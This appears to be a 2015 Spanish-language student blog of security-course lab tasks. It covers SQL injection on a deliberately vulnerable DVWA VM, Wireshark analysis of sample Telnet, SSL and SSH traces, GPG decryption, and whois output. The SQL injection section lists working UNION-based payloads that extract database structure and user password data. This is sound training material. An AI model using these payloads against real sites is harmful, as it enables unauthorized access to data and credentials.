Páginas

miércoles, 30 de septiembre de 2015

Unidad 2: Tarea 2

TAREA 2: SQL injection

Usa la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos.
Para ello necesitaras usar una máquina virtual preparada para el software de simulación VirtualBox. Si no tienes instalado VirtualBox puedes descargar el instalador desde la siguiente página web:
En el caso de los sistemas GNU/Linux, la instalación se puede realizar a través del sistema de gestión de paquetes, aunque se recomienda usar las versiones más recientes disponibles en la web de VirtualBox (ya que algunos sistemas GNU/Linux tienen versiones algo más antiguas que no se han probado y no se garantiza que funcionen).
La máquina virtual (380MB) en formato 7-Zip lo podéis descargar a través del siguiente enlace:

1. Montar Maquina Virtual dvwa en Virtual Box
2. Revisar dirección IP de máquina virtual: 192.168.56.101


3. Abrir el navegador e ingresar: http://dirección_ip/dvwa/login.php
4. Ingresar usuario: admin y contraseña: password.


5. Acceder a DVWA Security y bajar la seguridad como en la imagen.


6. Acceder a SQL Injection e ingresar las siguientes sentencias sql para extraer información:
 

  
1

%' or '0'='0

%' or 0=0 union select null, version() #

%' or 0=0 union select null, user() #

%' or 0=0 union select null, database() #

%' and 1=0 union select null, table_name from information_schema.tables #

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Información obtenida:

Versión de BD: 5.5.44-0
Sistema Operativo: Debian
Usuario de BD: dvwa@localhost
Base de BD: dvwa

martes, 29 de septiembre de 2015

Unidad 2: Tarea 1

Tarea 1: Capturando tráfico con Wireshark

Primera parte: analizando un protocolo inseguro - Telnet.

En esta tarea no vamos a realizar capturas en vivo de tráfico, sino que vamos a analizar trazas (capturas) ya realizadas con anterioridad y salvadas en archivos. En este caso, vamos a usar la traza telnet-raw.pcap, del repositorio de capturas disponible en Wireshark.
Descárgate la traza en tu ordenador y ábrela con Wireshark. Esta traza ha capturado el tráfico de una sesión de Telnet entre el cliente y el servidor.

1. Descarge de la traza.

2. Abra en Wireshark la traza.

3. Filtre telnet en el cuadro de filtro.


4. Una vez filtrado, pulsamos boton derecho del mouse en una de las tramas y seleccionamos “Follow TCP stream” como lo muestra la imagen.



 5. Aparecerá el Stream content del tráfico de una sesión de Telnet entre el cliente y el servidor, gracias a esto podemos responder las preguntas del ejercicio.

  



¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
Usuario: ffaakkee
Contraseña: user
¿Qué sistema operativo corre en la máquina?
OpenBSD
¿Qué comandos se ejecutan en esta sesión? 

ls
ls -a
ping
exit 

Segunda parte: analizando SSL.

Para la realización de este ejercicio, descarga esta traza con tráfico SSL y abrela con Wireshark. SSL es un protocolo seguro que utilizan otros protocolos de aplicación como HTTP. Usa certificados digitales X.509 para asegurar la conexión.

Escribimos el comando ssl para realizar el filtro como aparece en la imagen.

2. Luego igual que en ejercicio de telnet; seleccionamos: "Follow TCP stream" para recuperar la información capturada.


 ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
-  En la trama 2, paquete 1179.

¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
- El certificado se encuentra cifrado, pero se puede visualizar claramente que la autoridad que emitió el certificado es RSA Data Security.

¿Qué asegura el certificado, la identidad del servidor o del cliente?
- El certificado asegura la identidad del servidor.

Tercera parte: analizando SSH

En la primera parte de este ejercicio hemos visto un protocolo no seguro, como Telnet. Una alternativa a usar Telnet a la hora de conectarnos a máquinas remotas es SSH, que realiza una negociación previa al intercambio de datos de usuario. A partir de esta negociación, el tráfico viaja cifrado. Descarga esta traza con tráfico SSH y abrela con Wireshark.




¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?- Desde el paquete 20 comienza el tráfico cifrado.

¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
- Solamente viajan paquetes cifrados a través de SSH.

¿Es posible ver alguna información de usuario como contraseñas de acceso?
-  No, porque la información se encuentra cifrada.

lunes, 28 de septiembre de 2015

Unidad 1: Tarea 3

Tarea 3: Encriptación.


El objetivo principal de la criptografía es proteger nuestra información personal o corporativa, modificándola de manera que no sea comprensible para personas no autorizadas. Hablamos de que ciframos la información, para que atraviese un medio potencialmente inseguro como es Internet, y el destinatario descifra el mensaje recibido, y así puede comprenderlo. Para cifrar y descifrar usamos claves criptográficas. Esto es lo que conocemos como confidencialidad, una solución que aporta la criptografía a la seguridad de la información.

Además, la criptografía puede aportar otras soluciones a los problemas de seguridad como:
La integridad de los datos: garantizar que los datos no han sido modificados por un tercero.
La validación de la identidad, la autenticación: garantizar que nos estamos comunicando con la persona o sistema con el que realmente queremos comunicarnos.

Aplicación Utilizada: GPA (Windows)






 En este paso importamos la clave publica de Gisselle Encalada

 Nos agrega a la lista de claves publicas.


Ahora desencriptamos el archivo.

Tarea Resuelta.

PD: Para las proximas practicas trataré de hacerme el tiempo para instalar Linux.



martes, 22 de septiembre de 2015

Unidad 1: Tarea 1 y 2

Tarea 1: Herramientas Básicas


1. Ping
  • www.google.cl
  • www.euskalert.net 


2. Whois

 Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered

with many different competing registrars. Go to http//www.internic.net
for detailed information.
Domain Name EUSKALERT.NET
Registrar ACENS TECHNOLOGIES, S.L.U.
Sponsoring Registrar IANA ID 140
Whois Server whois.interdomain.net
Referral URLhttp://www.interdomain.es
Name Server NS1.MONDRAGON.EDU
Name Server NS2.MONDRAGON.EDU
Status ok http://www.icann.org/epp#OK
Updated Date 30-jan-2015
Creation Date 31-oct-2006
Expiration Date 31-oct-2015


>>> Last update of whois database Wed, 23 Sep 2015 01:03:16 GMT <<<


Domain Name euskalert.net
Registry Domain ID:
Registrar WHOIS Server whois.interdomain.net
Registrar URLhttp://www.acens.com/
Updated Date 2015-05-07T13:44:45Z
Creation Date 2006-10-31T12:56:37Z
Registrar Registration Expiration Date 2015-10-31T11:56:37Z
Registrar acens Technologies, S.L.U.
Registrar IANA ID 140
Registrar Abuse Contact Emailabuse@acens.com
Registrar Abuse Contact Phone+34.911418583
Domain Status ok http://www.icann.org/epp#ok
Registry Registrant ID:
Registrant Name Mondragon Goi Eskola Politeknikoa, J.M.A., S.Coop
Registrant Organization:
Registrant Street Loramendi 4
Registrant City Arrasate
Registrant State/Province Gipuzkoa
Registrant Postal Code 20500
Registrant Country ES
Registrant Phone 943794700
Registrant Fax:
Registrant Emailamanterola@eps.mondragon.edu
Registry Admin ID:
Admin Name Mondragon Goi Eskola Politeknikoa, J.M.A., S.Coop
Admin Organization Mondragon Goi Eskola Politeknikoa, J.M.A., S.Coop
Admin Street Loramendi,4
Admin City Arrasate
Admin State/Province GIPUZKOA
Admin Postal Code 20500
Admin Country ES
Admin Phone +34.943794700
Admin Fax:
Admin Emailsistemak@eps.mondragon.edu
Registry Tech ID:
Tech Name RESPONSABLE DE DNS
Tech Organization RESPONSABLE DE DNS
Tech Street JULIAN CAMARILLO 6
Tech City MADRID
Tech State/Province MADRID
Tech Postal Code 28013
Tech Country ES
Tech Phone +34.913752300
Tech Fax:
Tech Emaildns_admin@corp.terra.es
Name Server ns1.mondragon.edu
Name Server ns2.mondragon.edu
URL of the ICANN WHOIS Data Problem Reporting Systemhttp://wdprs.internic.net/
>>> Last update of WHOIS database2015-05-07T13:44:45Z<<<
For more information on Whois status codes, please visit
https//www.icann.org/resources/pages/epp-status-codes-2014-06-16-en





3. Nmap





 
 Tarea 2: Búsqueda y puesta en común de recursos


  1. https://www.elhacker.net/hacking.html
  2. http://cursohacker.es/
  3. www.dragonjar.org